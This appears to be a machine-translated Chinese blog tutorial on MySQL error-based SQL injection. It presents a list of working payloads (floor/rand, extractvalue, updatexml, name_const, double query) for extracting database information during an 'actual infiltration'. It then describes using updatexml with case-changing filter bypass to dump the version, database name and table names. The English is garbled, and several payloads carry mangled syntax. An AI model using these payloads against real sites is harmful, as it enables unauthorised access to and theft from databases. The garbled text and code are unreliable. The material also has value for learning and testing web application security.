In our actual infiltration, obviously found an injection point, this thought was lost to Sqlmap can be, the results Sqlmap only show is really injection point, but the database is not get, 1, then we can use manual injection, to determine the filter rules and basic filtering situation, Then select the corresponding Sqlmap script (if any), this article is mainly about how to use the MySQL function error to inject, in addition to using manual process of full injection, if you know sqlmap inside have corresponding script, please tell me, thank you!.
650) this.width=650; "Src=" https://s3.51cto.com/wyfs02/M02/A4/6E/wKioL1mrZdiAlu2WAAHAigyM4E8873.jpg-wh_500x0-wm_ 3-wmp_4-s_1890801678.jpg "title=" 1.jpg "alt=" Wkiol1mrzdialu2waahaigym4e8873.jpg-wh_50 "/>
Figure 1 Getting a database failure
At this point we can consider whether it is explicit error injection, we can use the MySQL explicit error injection function to query the database information for the explicit error injection.
Error via Floor:
and select 1 from (SELECT COUNT (*), concat (version (), Floor (rand (0))) x from Information_schema.tables Group by X)
and (select COUNT (*) from (SELECT 1 Union SELECT NULL UNION SELECT! 1) x GROUP by Concat ((select version ()), Floor (rand (0) * 2)))
Through Extractvalue error:
and Extractvalue (1, concat (0x7f, (select Version ()), 0x7f))
Through Updatexml error:
and 1= (Updatexml (1,concat (0x7f, (select Version ()), 0x7f), 1))
Through Name_const error:
and 1= (SELECT * FROM (select Name_const (Version (), 1), Name_const (version (), 1)) as X)
Through the wrong double query:
or 1 Group by CONCAT_WS (0x7f,version (), Floor (rand (0)) has min (0) or 1
Here we use Updatexml error to carry out actual combat demonstration, 2 is a mistake injection point.
650) this.width=650; "Src=" https://s4.51cto.com/wyfs02/M02/A4/6F/wKioL1mrbU-C0a8RAACQAXA8D38440.jpg-wh_500x0-wm_ 3-wmp_4-s_1012095351.jpg "title=" 2.jpg "alt=" Wkiol1mrbu-c0a8raacqaxa8d38440.jpg-wh_50 "/>
Figure 2 Error Injection point
At this point we will do SQL injection through Updatexml, here because the keyword is filtered, so we need to use case to bypass, first we query the database version, 3, the successful acquisition of the database version.
650) this.width=650; "Src=" https://s3.51cto.com/wyfs02/M01/A4/6F/wKioL1mrbkbjMtwoAAC9-K9ywNk540.jpg-wh_500x0-wm_ 3-wmp_4-s_3026743414.jpg "title=" 3.jpg "alt=" Wkiol1mrbkbjmtwoaac9-k9ywnk540.jpg-wh_50 "/>
Figure 3 Getting database version information
Gets the database name, as shown in 4.
650) this.width=650; "Src=" https://s5.51cto.com/wyfs02/M02/05/BD/wKiom1mrcKGjroMaAAC42nt38yI886.jpg-wh_500x0-wm_ 3-wmp_4-s_1853663715.jpg "title=" 4.jpg "alt=" Wkiom1mrckgjromaaac42nt38yi886.jpg-wh_50 "/>
Figure 4 Getting the data name
Gets the table name, as shown in 5.
650) this.width=650; "Src=" https://s4.51cto.com/wyfs02/M01/05/BE/wKiom1mrcVKToMzTAAEBa6GYeo8084.jpg-wh_500x0-wm_ 3-wmp_4-s_2795074839.jpg "title=" 5.jpg "alt=" Wkiom1mrcvktomztaaeba6gyeo8084.jpg-wh_50 "/>
Figure 5 Getting the table name
For follow-up, please refer to the article "MySQL manual injection", here no more cumbersome!
This article is from the "eth10" blog, make sure to keep this source http://eth10.blog.51cto.com/13143704/1962253
SQL injection of MySQL explicit error injection
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
